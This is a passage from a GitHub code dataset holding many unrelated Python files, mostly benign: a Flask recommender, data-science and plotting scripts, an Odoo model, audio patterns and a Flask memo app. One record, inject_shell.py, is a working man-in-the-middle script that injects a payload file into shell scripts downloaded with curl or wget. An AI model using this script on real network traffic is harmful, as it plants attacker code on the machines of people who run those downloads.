a[0] == articlename:\n article = a\n recommend = recommended(article, articles, 5)\n title = article[1]\n textlist = article[2].split('\\n\\n')\n return render_template('article.html', title = title, textlist = textlist, rec_list = recommend)\n\n\n# initialization\ni = sys.argv.index('server:app')\nglove_filename = sys.argv[i+1]\narticles_dirname = sys.argv[i+2]\n\ngloves = load_glove(glove_filename)\narticles = load_articles(articles_dirname, gloves)\n","repo_name":"Hatchin/school-projects","sub_path":"article-recommendation/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9396954175","text":"#!/usr/bin/python\n\n# Usage: mitmdump -s \"inject_shell.py payload.sh\"\n# (this script works best with --anticache)\nfrom libmproxy.protocol.http import decoded\n\n\ndef start(context, argv):\n if len(argv) != 2:\n raise ValueError('Usage: -s \"inject_shell.py payload.sh\"')\n context.payload = get_payload(argv[1])\n\n\ndef get_payload(payload_file):\n \"\"\"\n Read the payload file, and strip out the shebang if it exists\n \"\"\"\n f = open(payload_file, 'r')\n lines = f.readlines()\n if lines[0].startswith(\"#!\"):\n lines = lines[1:]\n f.close()\n return '\\n'.join(lines)\n\n\ndef is_shell_script(resp):\n \"\"\"\n Returns true if the request is a possible shell script\n \"\"\"\n shell_content_type = False\n content_type = resp.headers.get_first(\"content-type\", \"\")\n # if content-type is set, should be text/*\n if content_type != \"\" and not content_type.startswith('text/'):\n return False\n # and should start with shebang\n if not resp.content.startswith('#!'):\n return False\n return True\n\n\ndef is_cli_tool(req):\n \"\"\"\n Returns true if the user-agent looks like curl or wget\n \"\"\"\n user_agent = req.headers.get_first(\"User-Agent\", \"\")\n if user_agent.startswith('curl'):\n return True\n if user_agent.startswith('Wget'):\n return True\n return False\n\n\ndef response(context, flow):\n resp = flow.response\n req = flow.request\n with decoded(resp):\n if is_shell_script(resp) and is_cli_tool(req):\n flow.response.content = flow.response.content.replace(\n '\\n',\n '\\n' + context.payload + '\\n',\n 1)","repo_name":"chrishepner/sh-mitm","sub_path":"inject_shell.py","file_name":"inject_shell.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"28286709770","text":"class Solution(object):\n def numSquares(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n dp = {}\n dp[0] = 0\n dp[1] = 1\n for i in range(2, n+1):\n minsteps = n\n for j in range(int(i**0.5), 0, -1):\n minsteps = min(minsteps,dp[i-(j*j)] + 1)\n dp[i] = minsteps\n \n return dp[n]\n","repo_name":"qasim-mansoor/Leetcode","sub_path":"Perfect Squares.py","file_name":"Perfect Squares.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19001816958","text":"import re\r\n\r\n\r\ndef get_frequency(string): # define the function for getting the characters' frequency\r\n frequency = {} # define a dictionary that will hold every character with its frequency\r\n pattern = r'[^\\s\\n\\r\\b\\t\\f\\v\\a]' # regex created to avoid cases where a special character is counted\r\n for char in string: # loop through the characters of the string\r\n if re.match(pattern, char): # check if the character matches the regex\r\n if char in frequency: # check if the character is already in the dictionary\r\n frequency[char] += 1 # if it is, increment its frequency\r\n else:\r\n frequency[char] = 1 # if it's not, add the character to the dictionary\r\n # sort the dictionary by value to create a list that contains every character with its frequency\r\n frequency_list = sorted(frequency.items(), key=lambda item: item[1],\r\n reverse=True)\r\n result = '' # define an empty string that will hold the final result\r\n for char, freq in frequency_list: # loop through the list's items\r\n result += char + str(freq) # add the character and its frequency to the final string\r\n return result\r\n\r\n\r\nif __name__ == '__main__':\r\n input1 = \"testinnput\"\r\n input2 = \" \\n\\r\\b\\t\\f\\v\\atestinnput\"\r\n output1 = get_frequency(input1)\r\n output2 = get_frequency(input2)\r\n print(output1)\r\n print(output2)\r\n","repo_name":"barbubo/char_freq","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13548194350","text":"from odoo import api, fields, models\n\n\nclass QCWorksheetQuestion(models.Model):\n _name = \"qc_worksheet.question\"\n _description = \"QC Worksheet - Question\"\n _order = \"worksheet_id, sequence\"\n\n worksheet_id = fields.Many2one(\n string=\"QC Worksheet\",\n comodel_name=\"qc_worksheet\",\n required=True,\n ondelete=\"cascade\",\n )\n sequence = fields.Integer(\n string=\"Sequence\",\n required=True,\n default=5,\n readonly=True,\n )\n name = fields.Char(\n string=\"Question\",\n required=True,\n readonly=True,\n )\n type = fields.Selection(\n string=\"Type\",\n selection=[\n (\"qualitative\", \"Qualitative\"),\n (\"quantitative\", \"Quantitative\"),\n ],\n required=True,\n )\n set_id = fields.Many2one(\n string=\"Value Set\",\n comodel_name=\"qc_value_set\",\n readonly=True,\n )\n allowed_qc_value_ids = fields.Many2many(\n string=\"Allowed QC Value\",\n comodel_name=\"qc_value_item\",\n compute=\"_compute_allowed_qc_value_ids\",\n store=False,\n )\n qualitative_value_id = fields.Many2one(\n string=\"Qualitative Value\",\n comodel_name=\"qc_value_item\",\n )\n quantitative_value = fields.Float(\n string=\"Quantitative Value\",\n )\n min_value = fields.Float(\n string=\"Min. Value\",\n )\n max_value = fields.Float(\n string=\"Max. Value\",\n )\n uom_id = fields.Many2one(\n string=\"UoM\",\n comodel_name=\"uom.uom\",\n readonly=True,\n )\n valid_values = fields.Char(\n string=\"Valid Values\",\n compute=\"_compute_valid_values\",\n store=True,\n )\n success = fields.Boolean(\n string=\"Success?\",\n compute=\"_compute_result\",\n store=True,\n )\n\n @api.depends(\n \"set_id\",\n )\n def _compute_allowed_qc_value_ids(self):\n for record in self:\n result = self.env[\"qc_value_item\"]\n if record.set_id:\n for item in record.set_id.value_ids:\n result += item.item_id\n record.allowed_qc_value_ids = result\n\n @api.depends(\n \"allowed_qc_value_ids\",\n \"min_value\",\n \"max_value\",\n \"type\",\n \"set_id\",\n )\n def _compute_valid_values(self):\n for record in self:\n if record.type == \"qualitative\":\n criteria = [\n (\"set_id\", \"=\", record.set_id.id),\n (\"item_id\", \"=\", record.qualitative_value_id.id),\n (\"ok\", \"=\", True),\n ]\n values = self.env[\"qc_value_set.value\"].search(criteria)\n record.valid_values = \", \".join([x.name for x in values])\n elif record.type == \"quantitative\":\n record.valid_values = \"{}-{}\".format(record.min_value, record.max_value)\n\n @api.depends(\n \"type\",\n \"max_value\",\n \"min_value\",\n \"quantitative_value\",\n \"qualitative_value_id\",\n \"allowed_qc_value_ids\",\n \"set_id\",\n )\n def _compute_result(self):\n for record in self:\n if record.type == \"qualitative\":\n criteria = [\n (\"set_id\", \"=\", record.set_id.id),\n (\"item_id\", \"=\", record.qualitative_value_id.id),\n ]\n values = self.env[\"qc_value_set.value\"].search(criteria)\n if len(values) > 0:\n record.success = values[0].ok\n else:\n record.success = (\n record.max_value >= record.quantitative_value >= record.min_value\n )\n","repo_name":"open-synergy/ssi-quality-control","sub_path":"ssi_quality_control/models/qc_worksheet_question.py","file_name":"qc_worksheet_question.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37236692227","text":"from Level import *\nimport random\n\n\nclass Game:\n def __init__(self, id):\n self.id = id\n self.entities = []\n self.__maps = []\n self.__current_map = 0\n\n self.__map_1 = self.__load_map(\"Leveleditor/Files/level1.json\")\n self.__map_2 = self.__load_map(\"Leveleditor/Files/level2.json\")\n\n def current_map_index_plus(self):\n self.__current_map += 1\n if len(self.__maps) >= self.__current_map:\n self.__current_map = len(self.__maps) - 1\n return False\n\n return True\n\n def __remove_from_list(self, item, list):\n lst = []\n e = list\n e.remove(item)\n for i in e:\n lst.append(i)\n\n return lst\n\n def get_random_map_entities(self):\n random_map = random.choice(self.__maps)\n return self.get_map_entities(random_map)\n\n\n def get_map_entities(self, map=None):\n if map == None:\n map = self.__maps[self.__current_map]\n\n spawn_x = 0\n spawn_y = 0\n for i in map:\n if i[2] == \"SPAWN_POINT\":\n spawn_x = i[0] + (37 * len(self.entities))\n spawn_y = i[1]\n break\n\n name = map[-1]\n map.remove(map[-1])\n\n return map, [spawn_x, spawn_y], name\n\n def reset_map(self, name, map):\n for m in self.__maps:\n if map == m:\n m.append(name)\n break\n\n return map\n\n def __load_map(self, path):\n map, name = load(path)\n map.append(name)\n self.__maps.append(map)\n return map, name\n\n\n def get_entities_without_one_index(self, index):\n lst = []\n for i in range(len(self.entities)):\n if i != index:\n lst.append(self.entities[i])\n\n return lst\n\n","repo_name":"emecoding/Multiplayer2D","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14606693314","text":"import wbgapi as wb \r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt\r\nimport plotly.express as px\r\n\r\n\r\npais_input = input(\"Pais a buscar: \")\r\npais = wb.economy.info(q=pais_input)\r\n\r\nprint(pais)\r\n\r\nid_input = input(\"Seleccione el id: \")\r\n\r\n\r\n\r\ndata_list = []\r\nchoice = 0\r\n\r\ntema_input = str(input(\"Variable a buscar: \"))\r\ntema = wb.series.list(q=tema_input)\r\n\r\nfor id in tema:\r\n id_title = id[\"id\"]\r\n data_list.append(id_title)\r\n print(str(choice) + \": \" + str(id[\"value\"]))\r\n choice = choice + 1\r\n\r\nselection = int(input(\"Seleccione el indicador deseado: \"))\r\n\r\naño_inicio = int(input(\"Seleccione el año de inicio: \"))\r\naño_final = int(input(\"Seleccione el año final: \"))\r\n\r\ndata = wb.data.DataFrame(data_list[selection], id_input, range(año_inicio, año_final), index=\"time\",numericTimeKeys=True, \r\n labels=True).plot(figsize=(10, 6))\r\n\r\nplt.title(str(id[\"value\"]))\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"JesusPerezPaco/BM_PYTHON","sub_path":"indicadores.py","file_name":"indicadores.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29337778812","text":"\"\"\"\r\nimport json\r\n\r\n# python列表转为json\r\ndata01 = [{\"ZRF\": \"周润发\", \"age\": 19}, {\"CSY\": 2, \"age\": 20}, {\"sty\": 3, \"age\": 23}]\r\n\r\ndata01_json = json.dumps(data01, ensure_ascii=False)\r\nprint(\"data01_json的类型是:{}\".format(type(data01_json)))\r\nprint(data01_json)\r\n\r\n# python字典转为json\r\ndata02 = {\"HJT\": \"胡锦涛\", \"add\": \"中南海\"}\r\n\r\ndata02_json = json.dumps(data02, ensure_ascii=False)\r\nprint(\"data02_json的类型是:{}\".format(type(data01_json)))\r\nprint(data02_json)\r\n\r\n# json转回python(经过上述转换已有data01_json、data02_json)\r\ndata01_py = json.loads(data01_json)\r\n\r\nprint(type(data01_py))\r\nprint(data01_py)\r\n\r\ndata02_py = json.loads(data02_json)\r\n\r\nprint(type(data02_py))\r\nprint(data02_py)\r\n\"\"\"\r\n\r\n# pyecharts入门\r\nfrom pyecharts.charts import Line\r\nfrom pyecharts.options import TitleOpts, LegendOpts, ToolboxOpts, VisualMapOpts\r\n\r\nline = Line()\r\nline.add_xaxis([\"中国\", \"日本\", \"韩国\"])\r\nline.add_yaxis(\"GDP\", [30, 20, 10])\r\n\r\nline.set_global_opts(\r\n title_opts=TitleOpts(title = \"GDP图标\", pos_left=\"center\", pos_bottom=\"1%\"),\r\n legend_opts=LegendOpts(is_show=True),\r\n toolbox_opts=ToolboxOpts(is_show=True),\r\n visualmap_opts=VisualMapOpts(is_show=True)\r\n)\r\n\r\nline.render()\r\n\r\n","repo_name":"ShenTengyu/python_learning","sub_path":"practice_py/practice/practice_projects/project01/project01.py","file_name":"project01.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13073500811","text":"### The code below automatically formats a dataset to be ready for use by BERT:\nimport pandas as pd\nimport csv\nimport string\nfrom preprocessing_utils import num_balanced_labels\n\ndata_col = \"your_data\"\nlabel_col = \"data_label\"\n\n### Load in the file to be converted into bert datasets\n## Enter the name of the original dataset\nBERT_file_in = \"original_data.csv\"\n## Read in the original dataset\n# NOTE: The read_csv funciton may not be able to read data with encoding 'utf-8' if the data\n# contains improper values for this encoding. These values must be removed before this\n# step since BERT requires proper data.\ndf = pd.read_csv(BERT_file_in, engine = 'python', encoding='utf-8');\n\n### Create the three required train/test/dev datasets for bert:\n## Creates the three required dataset for BERT using balanced and clean data\n## Initialize the lists of text data and the associated labels\ndev_coms = []\ntest_coms = []\ntrain_coms = []\ndev_lab = []\ntest_lab = []\ntrain_lab = []\n## Initialize the counts of classes true/false for each dataset\nd_no = 0\nte_no = 0\ntr_no = 0\nd_yes = 0\nte_yes = 0\ntr_yes = 0\n## Clean the data and determine/alot the balanced class quantities to each dataset\nnum_labels = num_balanced_labels(data_col, label_col, df)\nsplit_value = num_labels * 0.1 # This results in 80-10-10% train/test/dev split with balanced data for each dataset\n## Portion the data into each list\nfor i in range(len(df)):\n val = int(df['ID'][i])\n text = df['Label'][i]\n if text == \"\" or isinstance(text, str) == False or text == \" \":\n continue\n text = \"\".join(filter(lambda char: char in string.printable, text))\n text = text.strip()\n if val == 0:\n if d_no != split_value:\n d_no = d_no + 1\n dev_lab.append(val)\n dev_coms.append(text)\n elif te_no != split_value:\n te_no = te_no + 1\n test_lab.append(val)\n test_coms.append(text)\n else:\n tr_no = tr_no + 1\n train_lab.append(val)\n train_coms.append(text)\n else:\n if d_yes != split_value:\n d_yes = d_yes + 1\n dev_lab.append(val)\n dev_coms.append(text)\n elif te_yes != split_value:\n te_yes = te_yes + 1\n test_lab.append(val)\n test_coms.append(text)\n else:\n tr_yes = tr_yes + 1\n train_lab.append(val)\n train_coms.append(text)\nprint(\"The number of observations for the train/test/dev datasets is:\")\nprint(len(train_coms), len(test_coms), len(dev_coms))\n## Create the datasets, only the test dataset is supposed to have a header\nwith open('dev.csv', 'w', newline = '') as f:\n writer = csv.writer(f)\n # Unoffical header is [\"ID\", \"Label\", \"Throwaway\", \"Text\"]\n for i in range(len(dev_coms)):\n val = dev_lab[i]\n text = dev_coms[i]\n writer.writerow([ i, val, 'a', text])\nwith open('test.csv', 'w', newline = '') as f:\n writer = csv.writer(f)\n writer.writerow([\"id\", \"Label\", \"sentence\"])\n for i in range(len(test_coms)):\n val = test_lab[i]\n text = test_coms[i]\n writer.writerow([ i, val, text])\nwith open('train.csv', 'w', newline = '') as f:\n writer = csv.writer(f)\n # Unoffical header is [\"ID\", \"Label\", \"Throwaway\", \"Text\"]\n for i in range(len(train_coms)):\n val = train_lab[i]\n text = train_coms[i]\n writer.writerow([ i, val, 'a', text])\n## BERT requires tsv files so this creates tsv versions of the newly formed datasets\ndf = pd.read_csv('dev.csv')\ndf.to_csv('dev.tsv', sep='\\t', index=False, header=False)\ndf = pd.read_csv('test.csv')\ndf.to_csv('test.tsv', sep='\\t', index=False, header=True)\ndf = pd.read_csv('train.csv')\ndf.to_csv('train.tsv', sep='\\t', index=False, header=False)","repo_name":"ushvarma/PeerLogic","sub_path":"src/data_preprocessing/bert_prerprocessing.py","file_name":"bert_prerprocessing.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20950956035","text":"from torchvision import transforms\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\nimport os\nimport numpy as np\nimport pandas as pd\nimport cv2\nfrom imgaug import augmenters as iaa\nimport random\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\nimport warnings\n\nwarnings.filterwarnings('ignore')\nRESIZE_SIZE = int(224 * 1.2)\n\n\ndef random_cropping(image, target_shape=(224, 224, 3), is_random=True):\n image = cv2.resize(image, (RESIZE_SIZE, RESIZE_SIZE))\n target_h, target_w, _ = target_shape\n height, width, _ = image.shape\n if is_random:\n start_x = random.randint(0, width - target_w)\n start_y = random.randint(0, height - target_h)\n else:\n start_x = (width - target_w) // 2\n start_y = (height - target_h) // 2\n\n zeros = image[start_y:start_y + target_h, start_x:start_x + target_w, :]\n return zeros\n\n\ndef random_resize(img, probability=0.5, minRatio=0.2):\n if random.uniform(0, 1) > probability:\n return img\n\n ratio = random.uniform(minRatio, 1.0)\n\n h = img.shape[0]\n w = img.shape[1]\n\n new_h = int(h * ratio)\n new_w = int(w * ratio)\n\n img = cv2.resize(img, (new_w, new_h))\n img = cv2.resize(img, (w, h))\n return img\n\n\ndef TTA_36_cropps(image, target_shape=(224, 224, 3)):\n image = cv2.resize(image, (RESIZE_SIZE, RESIZE_SIZE))\n\n width, height, d = image.shape\n target_w, target_h, d = target_shape\n\n start_x = (width - target_w) // 2\n start_y = (height - target_h) // 2\n\n starts = [[start_x, start_y],\n\n [start_x - target_w, start_y],\n [start_x, start_y - target_w],\n [start_x + target_w, start_y],\n [start_x, start_y + target_w],\n\n [start_x + target_w, start_y + target_w],\n [start_x - target_w, start_y - target_w],\n [start_x - target_w, start_y + target_w],\n [start_x + target_w, start_y - target_w],\n ]\n\n images = []\n\n for start_index in starts:\n image_ = image.copy()\n x, y = start_index\n\n if x < 0:\n x = 0\n if y < 0:\n y = 0\n\n if x + target_w >= RESIZE_SIZE:\n x = RESIZE_SIZE - target_w - 1\n if y + target_h >= RESIZE_SIZE:\n y = RESIZE_SIZE - target_h - 1\n\n zeros = image_[x:x + target_w, y: y + target_h, :]\n\n image_ = zeros.copy()\n\n zeros = np.fliplr(zeros)\n image_flip_lr = zeros.copy()\n\n zeros = np.flipud(zeros)\n image_flip_lr_up = zeros.copy()\n\n zeros = np.fliplr(zeros)\n image_flip_up = zeros.copy()\n\n images.append(image_.reshape([1, target_shape[0], target_shape[1], target_shape[2]]))\n images.append(image_flip_lr.reshape([1, target_shape[0], target_shape[1], target_shape[2]]))\n images.append(image_flip_up.reshape([1, target_shape[0], target_shape[1], target_shape[2]]))\n images.append(image_flip_lr_up.reshape([1, target_shape[0], target_shape[1], target_shape[2]]))\n\n return images\n\n\ndef transform_image1(image, target_shape=(224, 224, 3), is_infer=False):\n if is_infer:\n augment_img = iaa.Sequential([\n iaa.Fliplr(0),\n ])\n\n image = augment_img.augment_image(image)\n image = TTA_36_cropps(image, target_shape)\n return image\n\n else:\n augment_img = iaa.Sequential([\n iaa.Fliplr(0.5),\n iaa.Flipud(0.5),\n iaa.Affine(rotate=(-30, 30)),\n ], random_order=True)\n\n image = augment_img.augment_image(image)\n image = random_resize(image)\n image = random_cropping(image, target_shape, is_random=True)\n return image\n\n\ndef transform_image(image, im_size=224, task='train'):\n if task == 'train':\n tf = A.Compose([A.Downscale(scale_min=0.25, scale_max=0.5, p=0.5),\n A.Affine(scale=(1.5, 2.0), keep_ratio=True, p=0.5),\n A.HorizontalFlip(p=0.5),\n A.VerticalFlip(p=0.5),\n A.Resize(height=im_size, width=im_size, always_apply=True),\n A.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ToTensorV2(always_apply=True),\n ],\n p=1.0,\n )\n else:\n tf = A.Compose([A.Resize(height=im_size, width=im_size, always_apply=True),\n A.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ToTensorV2(always_apply=True)],\n p=1.0,\n )\n return tf(image=image)['image'].float()\n\n\nclass FAS_Dataset(Dataset):\n def __init__(self, df, video_dir, transforms=transform_image):\n self.df = df.reset_index(drop=True)\n self.video_dir = video_dir\n self.transforms = transforms\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, item):\n row = self.df.iloc[item]\n vid_name = row['fname']\n vid_path = os.path.join(self.video_dir, vid_name)\n cap = cv2.VideoCapture(vid_path)\n frame_no = row['frame_index']\n cap.set(1, frame_no) # Where frame_no is the frame you want\n ret, im = cap.read()\n im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)\n\n im_ts = self.transforms(im)\n\n if 'liveness_score' in self.df.columns:\n label = torch.tensor(row['liveness_score']).float()\n else:\n label = -1\n return im_ts, label\n\n\nif __name__ == '__main__':\n df = pd.read_csv(\n r\"/Users/nguyenbaophuoc/Desktop/Studying/My_work/Zalo_AI_Face_Anti_Spoofing/dataset/train/label_3_frame_5folds.csv\")\n df = df[df['fold'] == 0]\n from functools import partial\n dataset = FAS_Dataset(df,\n video_dir=r'/Users/nguyenbaophuoc/Desktop/Studying/My_work/Zalo_AI_Face_Anti_Spoofing/dataset/train/videos',\n transforms=partial(transform_image, task='train'))\n\n import matplotlib.pyplot as plt\n\n train_dl = DataLoader(dataset, batch_size=1, shuffle=True)\n it = iter(train_dl)\n fgx, ax = plt.subplots(nrows=4, ncols=5, figsize=(14, 8))\n ax = ax.flatten()\n for i in range(20):\n image, label = next(it)\n ax[i].imshow(image.squeeze().permute(1, 2, 0))\n ax[i].set_title(label)\n # print(image.max(), image.min())\n # print(label.dtype)\n plt.show()\n","repo_name":"baophuoc1903/Zalo_AI_Face_Anti_Spoofing","sub_path":"dataset/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":6441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72994689769","text":"import bisect\nfrom typing import Dict\nfrom uuid import UUID, uuid4\n\nfrom uqbar.objects import get_vars, new\n\nfrom supriya.assets import synthdefs\nfrom supriya.enums import CalculationRate\n\nfrom .events import (\n BusAllocateEvent,\n BusFreeEvent,\n CompositeEvent,\n GroupAllocateEvent,\n NodeFreeEvent,\n NullEvent,\n SynthAllocateEvent,\n)\nfrom .patterns import Pattern\n\n\nclass BusPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(\n self, pattern, calculation_rate=\"audio\", channel_count=1, release_time=0.25\n ):\n self._pattern = pattern\n self._calculation_rate = CalculationRate.from_expr(calculation_rate)\n self._channel_count = channel_count\n self._release_time = release_time\n\n ### PRIVATE METHODS ###\n\n def _adjust(self, expr, state):\n args, _, kwargs = get_vars(expr)\n updates = {}\n if hasattr(expr, \"target_node\") and expr.target_node is None:\n updates[\"target_node\"] = state[\"group\"]\n if hasattr(expr, \"synthdef\"):\n synthdef = getattr(expr, \"synthdef\") or synthdefs.default\n parameter_names = synthdef.parameter_names\n for name in (\"in_\", \"out\"):\n if name in parameter_names and kwargs.get(name) is None:\n updates[name] = state[\"bus\"]\n if updates:\n return new(expr, **updates)\n return expr\n\n def _iterate(self, state=None):\n return iter(self._pattern)\n\n def _setup_peripherals(self, state):\n rate = self._calculation_rate.name.lower()\n link_synthdef_name = f\"system_link_{rate}_{self._channel_count}\"\n starts = [\n BusAllocateEvent(\n calculation_rate=self._calculation_rate,\n channel_count=self._channel_count,\n id_=state[\"bus\"],\n ),\n GroupAllocateEvent(id_=state[\"group\"]),\n SynthAllocateEvent(\n add_action=\"ADD_AFTER\",\n amplitude=1.0,\n fade_time=self._release_time,\n in_=state[\"bus\"],\n synthdef=getattr(synthdefs, link_synthdef_name),\n target_node=state[\"group\"],\n id_=state[\"link\"],\n ),\n ]\n stops = [\n NodeFreeEvent(id_=state[\"link\"]),\n NodeFreeEvent(id_=state[\"group\"]),\n BusFreeEvent(id_=state[\"bus\"]),\n ]\n if self._release_time:\n stops.insert(1, NullEvent(delta=self._release_time))\n return CompositeEvent(starts), CompositeEvent(stops)\n\n def _setup_state(self) -> Dict[str, UUID]:\n return {\"bus\": uuid4(), \"link\": uuid4(), \"group\": uuid4()}\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n return self._pattern.is_infinite\n\n\nclass FxPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, pattern, synthdef, release_time=0.25, **kwargs):\n self._pattern = pattern\n self._release_time = release_time\n self._synthdef = synthdef\n self._kwargs = kwargs\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n return iter(self._pattern)\n\n def _setup_peripherals(self, state):\n starts = [\n SynthAllocateEvent(\n add_action=\"ADD_TO_TAIL\",\n synthdef=self._synthdef,\n id_=state[\"synth\"],\n **self._kwargs,\n )\n ]\n stops = [NodeFreeEvent(id_=state[\"synth\"])]\n if self._release_time:\n stops.insert(0, NullEvent(delta=self._release_time))\n return CompositeEvent(starts), CompositeEvent(stops)\n\n def _setup_state(self):\n return {\"synth\": uuid4()}\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n return self._pattern.is_infinite\n\n\nclass GroupPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, pattern, release_time=0.25):\n self._pattern = pattern\n self._release_time = release_time\n\n ### PRIVATE METHODS ###\n\n def _adjust(self, expr, state):\n updates = {}\n if hasattr(expr, \"target_node\") and expr.target_node is None:\n updates[\"target_node\"] = state[\"group\"]\n if updates:\n return new(expr, **updates)\n return expr\n\n def _iterate(self, state=None):\n return iter(self._pattern)\n\n def _setup_peripherals(self, state):\n starts = [GroupAllocateEvent(add_action=\"ADD_TO_HEAD\", id_=state[\"group\"])]\n stops = [NodeFreeEvent(id_=state[\"group\"])]\n if self._release_time:\n stops.insert(0, NullEvent(delta=self._release_time))\n return CompositeEvent(starts), CompositeEvent(stops)\n\n def _setup_state(self):\n return {\"group\": uuid4()}\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n return self._pattern.is_infinite\n\n\nclass ParallelPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, patterns):\n self._patterns = tuple(patterns)\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n should_stop = False\n iterators = []\n for index, pattern in enumerate(self._patterns):\n iterators.append((0.0, index, iter(pattern)))\n while iterators:\n grouping_offset = iterators[0][0]\n events = []\n while iterators and iterators[0][0] == grouping_offset:\n offset, index, iterator = iterators.pop(0)\n try:\n if should_stop:\n event = iterator.send(should_stop)\n else:\n event = next(iterator)\n events.append(event)\n triple = (offset + event.delta, index, iterator)\n insert_index = bisect.bisect_left(iterators, triple)\n iterators.insert(insert_index, triple)\n except StopIteration:\n pass\n if events:\n if iterators:\n delta = iterators[0][0] - grouping_offset\n else:\n delta = max(event.delta for event in events)\n if len(events) == 1:\n sent = yield new(events[0], delta=delta)\n elif len(events) > 1:\n sent = yield CompositeEvent(\n [new(x, delta=0.0) for x in events], delta=delta\n )\n if sent:\n should_stop = True\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n return any(pattern.is_infinite for pattern in self._patterns)\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"supriya/patterns/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"26309306979","text":"\"\"\" Bezier curve as a B-spline curve \"\"\"\nfrom larlib import *\n\ncontrols = [[0,1],[0,0],[1,1],[1,0]]\nbezier = larBezierCurve(controls)\ndom = larIntervals([32])([1])\nobj = larMap(bezier)(dom)\nVIEW(STRUCT( MKPOLS(obj) + [POLYLINE(controls)] ))\n\nknots = [0,0,0,0,1,1,1,1]\nbspline = BSPLINE(3)(knots)(controls)\ndom = larIntervals([100])([knots[-1]-knots[0]])\nobj = larMap(bspline)(dom)\nVIEW(STRUCT( MKPOLS(obj) + [POLYLINE(controls)] ))\n","repo_name":"cvdlab/lar-cc","sub_path":"test/py/splines/test09.py","file_name":"test09.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17519788406","text":"from math import pi, sin, asin, cos, atan2, sqrt\n\n__RADIAN__ = pi/180.0\n__RADIUS__ = 6371.01\n\nclass Point :\n\tdef __init__(self, latitude=0.0, longitude=0.0) :\n\t\tself.latitude = latitude\n\t\tself.longitude = longitude\n\t\n\t@staticmethod\n\tdef getSphereDistance(lon1, lat1, lon2, lat2):\n\t\tlon1, lat1, lon2, lat2 = lon1*__RADIAN__, lat1*__RADIAN__, lon2*__RADIAN__, lat2*__RADIAN__\n\t\tdlon = lon2 - lon1\n\t\tdlat = lat2 - lat1\n\t\ta = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n\t\treturn __RADIUS__*(2 * atan2(sqrt(a), sqrt(1-a)))\n\t\n\t@staticmethod\n\tdef getNextSpherePoint(lon1, lat1, course, distance):\n\t\tlon1 = __RADIAN__*lon1\n\t\tlat1 = __RADIAN__*lat1\n\t\tcourse = __RADIAN__*course\n\t\tdistance = distance/21851.944728932118\n\t\t\n\t\tlat2 = asin(sin(lat1)*cos(distance) + cos(lat1)*sin(distance)*cos(course))\n\t\tlon2 = lon1 + atan2(sin(course)*sin(distance)*cos(lat1), cos(distance)-sin(lat1)*sin(lat2))\n\t\treturn lon2/__RADIAN__, lat2/__RADIAN__\n\n","repo_name":"Piyawanno/Xerial","sub_path":"xerial/Point.py","file_name":"Point.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"11170288151","text":"from pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, render_template,jsonify,request\napp = Flask(__name__)\n\n#client = MongoClient('mongodb://test:test@localhost', 27017)\nclient = MongoClient('localhost', 27017)\ndb = client.kraft\ndb.counters.drop()\ndb.memoList.drop()\ndb.counters.insert_one({\"seq\" : 0})\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/memo/list', methods=['GET'])\ndef card_list():\n result = 